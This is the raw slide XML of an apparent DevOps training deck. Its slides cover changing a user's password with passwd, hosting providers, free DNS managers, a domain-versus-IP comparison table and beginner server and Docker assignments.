              <a:t>How to set/change </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>user's</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t> password?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5520">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="Google Shape;504;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402900" y="2267400"/>
            <a:ext cx="8520600" cy="1243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5300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd   &lt;userName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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4" name="Shape 4344"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4345" name="Google Shape;4345;p704"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7207225" y="299150"/>
            <a:ext cx="1658026" cy="472625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4346" name="Google Shape;4346;p704"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495350" y="808775"/>
            <a:ext cx="7880100" cy="606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b="1" lang="en" sz="2920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># List Down 10 popular hosting provider?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4347" name="Google Shape;4347;p704"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495350" y="1849649"/>
            <a:ext cx="7880100" cy="3203100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-414019" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2920"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2920" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Hetzner.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (Production Quality)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-414019" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2920"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contabo.com (Most Affordable)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-414019" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="2920"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DigitalOcean</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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1" name="Shape 4351"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4352" name="Google Shape;4352;p705"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541750" y="771775"/>
            <a:ext cx="7880100" cy="10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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To whom did Facebook acquire the fb.com domain from, and for how much money?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4353" name="Google Shape;4353;p705"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7207225" y="299150"/>
            <a:ext cx="1658026" cy="472625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4354" name="Google Shape;4354;p705"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3671150" y="1954900"/>
            <a:ext cx="1946873" cy="2419425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4355" name="Google Shape;4355;p705"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3358638" y="4477100"/>
            <a:ext cx="2571900" cy="35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Mark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zuckerberg</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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9" name="Shape 4359"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4360" name="Google Shape;4360;p706"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4413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Domain VS IP Address</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4361" name="Google Shape;4361;p706"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7512025" y="212400"/>
            <a:ext cx="1427726" cy="406975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4362" name="Google Shape;4362;p706"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="998925" y="1270900"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3768050"/>
                <a:gridCol w="3768050"/>
              </a:tblGrid>
              <a:tr h="712675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200"/>
                        <a:t>Domain</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2200"/>
                        <a:t>IP Address</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="524050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The numerical address of a computer that is connected with internet</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>numerical address of a computer that is connected with internet</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="5240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240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240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240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6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6" name="Shape 4366"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4367" name="Google Shape;4367;p707"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144001" cy="4802301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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1" name="Shape 4371"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4372" name="Google Shape;4372;p708"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7663" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="4749242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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6" name="Shape 4376"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4377" name="Google Shape;4377;p709"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="811600" y="509688"/>
            <a:ext cx="7331776" cy="4124126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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1" name="Shape 4381"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4382" name="Google Shape;4382;p710"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2835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#7 Assignments for DevOps</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4383" name="Google Shape;4383;p710"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768900" y="1394700"/>
            <a:ext cx="7943100" cy="3435300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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Clr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buy a 1 yr domain from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>GoDady.com</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a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buy a 1 month server from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Contabo.com</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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7" name="Shape 4387"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4388" name="Google Shape;4388;p711"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2835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120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Free DNS managers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4389" name="Google Shape;4389;p711"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768900" y="1394700"/>
            <a:ext cx="7943100" cy="3435300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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Clr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://freedns.centos-webpanel.com</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-400050" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.cloudflare.com/lp/pg-free-fast-secure-dns/</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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3" name="Shape 4393"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4394" name="Google Shape;4394;p71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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Assignment</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4395" name="Google Shape;4395;p712"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697350" y="1096775"/>
            <a:ext cx="7557300" cy="3046200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-422910" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3060"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3060">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create Docker Image with Dockerfile</a:t>
            </a:r>
            <a:endParaRPr sz="3060">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-422910" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3060"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3060">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create Container from Image</a:t>
            </a:r>
            <a:endParaRPr sz="3060">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-422910" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3060"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3060">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start the Container</a:t>
            </a:r>
            <a:endParaRPr sz="3060">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
